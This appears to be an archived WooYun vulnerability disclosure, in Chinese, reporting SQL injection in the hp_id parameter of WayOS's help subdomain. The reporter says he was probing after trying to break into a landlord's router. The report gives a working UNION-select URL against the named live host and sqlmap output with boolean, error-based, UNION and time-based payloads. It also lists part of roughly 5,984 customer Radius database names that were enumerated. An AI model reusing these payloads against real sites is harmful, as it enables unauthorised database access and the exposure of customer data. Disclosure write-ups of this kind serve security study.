乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-14: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-12-29: 厂商已经主动忽略漏洞,细节向公众公开
房东给我拉了网线,坑爹的网速100k/s,收我¥50/月本来想突破房东的路由,发现是wayos。到官网溜溜
在子站下发现一枚注入
http://help.wayos.cn//detail.php?hp_id=51%20and%201=2%20union%20select%201,concat%28user%28%29,0x20,database%28%29,0x20,version%28%29%29,3,4,5,6,7,8,9,10,11
使用sqlmap跑了一下
sqlmap identified the following injection points with a total of 43 HTTP(s) requests:---Place: GETParameter: hp_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: hp_id=47 AND 9686=9686 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: hp_id=47 AND (SELECT 6038 FROM(SELECT COUNT(*),CONCAT(0x3a736b6a3a,(SELECT (CASE WHEN (6038=6038) THEN 1 ELSE 0 END)),0x3a7670693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: hp_id=47 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a736b6a3a,0x486c4143774e454a534c,0x3a7670693a), NULL, NULL, NULL, NULL, NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: hp_id=47 AND SLEEP(5)---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: hp_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: hp_id=47 AND 9686=9686 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: hp_id=47 AND (SELECT 6038 FROM(SELECT COUNT(*),CONCAT(0x3a736b6a3a,(SELECT (CASE WHEN (6038=6038) THEN 1 ELSE 0 END)),0x3a7670693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: hp_id=47 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a736b6a3a,0x486c4143774e454a534c,0x3a7670693a), NULL, NULL, NULL, NULL, NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: hp_id=47 AND SLEEP(5)---
然后发现了数据库里居然有差不多6000个database,我勒个去,这都是什么啊数据库名:客户对wayos产品的命名+Radius
available databases [5984]:[*] a00jian_Radius[*] A023A_Radius[*] a03551_Radius[*] a10000_Radius[*] a100144_Radius[*] a10104091_Radius[*] a102699_Radius[*] a107258222_Radius[*] a109738668_Radius[*] a111111112_Radius[*] a11111111_Radius[*] a11111_Radius[*] a1111_Radius[*] a112013_Radius[*] a11788_Radius.......................................[*] zzq520_Radius[*] zzqjsy_Radius[*] zzsj0371_Radius[*] zzvnet_Radius[*] zzxqcdc_Radius[*] zzy1981_Radius[*] zzy8202003_Radius[*] zzzfan007_Radius
#1,先修复注入
未能联系到厂商或者厂商积极拒绝